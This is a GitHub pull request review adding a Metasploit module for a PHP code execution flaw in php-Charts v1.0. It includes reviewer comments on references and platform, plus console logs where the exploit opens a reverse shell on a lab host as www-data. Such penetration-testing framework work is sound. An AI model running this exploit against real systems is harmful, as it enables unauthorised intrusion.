Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add php-Charts v1.0 PHP Code Execution Exploit #1341

Merged
merged 3 commits into from Jan 20, 2013

Conversation

@bcoles
Copy link
Contributor

bcoles commented Jan 20, 2013

Add php-Charts v1.0 PHP Code Execution Vulnerability exploit module

],
'References' =>
[
['URL', 'http://www.exploit-db.com/exploits/24201/'],

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Jan 20, 2013

Contributor

It's an EDB reference, not URL

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Jan 20, 2013

Contributor

There is also OSVDB reference for this vulnerability: http://www.osvdb.org/show/osvdb/89334 , could you please add the reference?

{
'ExitFunction' => "none"
},
'Platform' => 'unix',

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Jan 20, 2013

Contributor

Seems like unix/webapps would be a better location than multi/http for this exploit, please, could you move it?

Or add more targets to really do it a "multi" platform exploit :)

@jvazquez-r7

This comment has been minimized.

Copy link
Contributor

jvazquez-r7 commented Jan 20, 2013

Tested successfully:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > check
[*] 192.168.1.154:80 - Sending check
[+] The target is vulnerable.
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sQkJsNt3VTXIrM6l;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sQkJsNt3VTXIrM6l\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46786) at 2013-01-20 17:11:45 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Once comments are fixed I think we'll be ready to merge it :-)

@jvazquez-r7 jvazquez-r7 merged commit dc318c5 into rapid7:master Jan 20, 2013
@jvazquez-r7

This comment has been minimized.

Copy link
Contributor

jvazquez-r7 commented Jan 20, 2013

Thanks,

Test after changes:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > exploit
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[*] Accepted the first client connection...
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the second client connection...
[*] Command: echo D0GYAZBZleRafqnB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "D0GYAZBZleRafqnB\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46790) at 2013-01-20 17:36:30 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Merged after updating references and disclosure date!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

2 participants
You can’t perform that action at this time.